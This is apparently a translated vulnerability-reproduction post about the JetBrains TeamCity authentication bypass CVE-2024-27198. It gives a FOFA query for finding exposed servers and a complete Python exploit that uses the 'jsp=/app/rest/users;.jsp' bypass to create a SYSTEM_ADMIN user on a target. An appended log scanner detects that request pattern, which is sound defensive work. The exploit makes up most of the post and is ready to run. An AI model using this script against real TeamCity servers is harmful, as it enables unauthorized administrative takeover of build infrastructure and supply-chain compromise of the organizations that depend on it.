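Disclaimer
The techniques, information and tools covered in this article are provided for study and reference only. Do not use the information in this article for any illegal activity or improper conduct. Any loss, consequence or adverse effect resulting from use of the information or tools in this article is the sole responsibility of the user and has nothing to do with the author. The author accepts no liability for any loss or consequence arising from use of the information or tools in this article. Using the information or tools provided here constitutes acceptance of this disclaimer and a commitment to comply with the relevant laws, regulations and ethical norms.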
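Vulnerability Description
JetBrains has released a new TeamCity version that fixes two high-severity vulnerabilities: the JetBrains TeamCity authentication bypass vulnerability (CVE-2024-27198) and the JetBrains TeamCity path traversal vulnerability (CVE-2024-27199). By exploiting CVE-2024-27198, an unauthenticated remote attacker can bypass authentication, create an administrator account, and take full control of all TeamCity projects, builds, agents and artifacts, which gives the attacker a position from which to carry out supply-chain attacks. A remote attacker exploiting this vulnerability can bypass authentication and execute arbitrary code on the system.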
Asset Mapping
FOFA: body="Log in to TeamCity"
Vulnerability Reproduction
import requests
import urllib3
import argparse
import re
urllib3.disable_warnings()

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target",required=True, help="Target TeamCity Server URL")
parser.add_argument("-u", "--username", required=True,help="Insert username for the new user")
parser.add_argument("-p", "--password",required=True, help="Insert password for the new user")
args = parser.parse_args()

vulnerable_endpoint = "/pwned?jsp=/app/rest/users;.jsp" # Attacker’s path to exploit CVE-2024-27198, please refer to the Rapid7's blogpost for more information

def check_version():
    response = requests.get(args.target+"/login.html", verify=False)
    repattern = r'<span class="vWord">Version</span>(.+?)</span>' # Regex pattern to extract the TeamCity version number
    try:
        version = re.findall(repattern, response.text)[0]
        print("[+] Version Found:", version)
    except:
        print("[-] Version not found")

def exploit():
    response = requests.get(args.target+vulnerable_endpoint, verify=False, timeout=10)
    http_code = response.status_code
    if http_code == 200:
        print("[+] Server vulnerable, returning HTTP", http_code) # HTTP 200 Status code is needed to confirm if the TeamCity Server is vulnerable to the auth bypass vuln
        create_user = {
            "username": args.username,
            "password": args.password,
            "email": f"{args.username}@mydomain.com",
            "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}, # Given admin permissions to your new user, basically you can have complete control of this TeamCity Server
        }
        headers = {"Content-Type": "application/json"}
        create_user = requests.post(args.target+vulnerable_endpoint, json=create_user, headers=headers, verify=False) # POST request to create the new user with admin privileges
        if create_user.status_code == 200:
            print("[+] New user", args.username, "created succesfully! \nGo to", args.target+"/login.html to login with your new credentials :)")
        else:
            print("[-] Error while creating new user")
    else:
        print("[-] Probable not vulnerable, returning HTTP", http_code)

check_version()
exploit()
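A defender-side check for the request shape the script above relies on, as an added example (not code from the original post or from JetBrains): it scans access-log lines for a `jsp=` query parameter whose value carries a `;.jsp` path parameter and reports which internal path was requested. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed log format: common/combined access log from a proxy in front of TeamCity.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def bypass_target(uri):
    """Return the internal path carried in jsp=<path>;.jsp, or None."""
    for pair in urlsplit(uri).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key).lower() != "jsp":
            continue
        for _ in range(3):  # undo nested percent-encoding
            value = unquote(value)
        path, sep, param = value.partition(";")
        if sep and param.lower().endswith(".jsp"):
            return path
    return None

def scan(lines):
    """Return one finding dict per log line that matches the bypass shape."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        target = bypass_target(m["uri"])
        if target is None:
            continue
        findings.append({
            "ip": m["ip"],
            "method": m["method"],
            "target": target,
            "status": int(m["status"]),
            # The script on this page treats HTTP 200 as proof the bypass worked.
            "bypassed": m["status"] == "200",
            "user_creation": m["method"] == "POST" and target.rstrip("/") == "/app/rest/users",
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [05/Mar/2024:10:00:01 +0000] "GET /login.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Mar/2024:10:00:05 +0000] "GET /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 812',
    '198.51.100.7 - - [05/Mar/2024:10:00:06 +0000] "POST /x?a=1&jsp=%2Fapp%2Frest%2Fusers%3B.jsp HTTP/1.1" 200 640',
    '203.0.113.4 - - [05/Mar/2024:10:02:00 +0000] "GET /nope?jsp=/app/rest/server;.jsp HTTP/1.1" 401 0',
    '192.0.2.10 - - [05/Mar/2024:10:03:00 +0000] "GET /viewLog.html?jsp=report HTTP/1.1" 200 900',
]
```

A finding with `user_creation` and `bypassed` both true warrants a review of the server's administrator accounts for entries nobody on the team created.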
Originally published on the WeChat official account 漏洞文库: [Vulnerability Reproduction] JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-27198)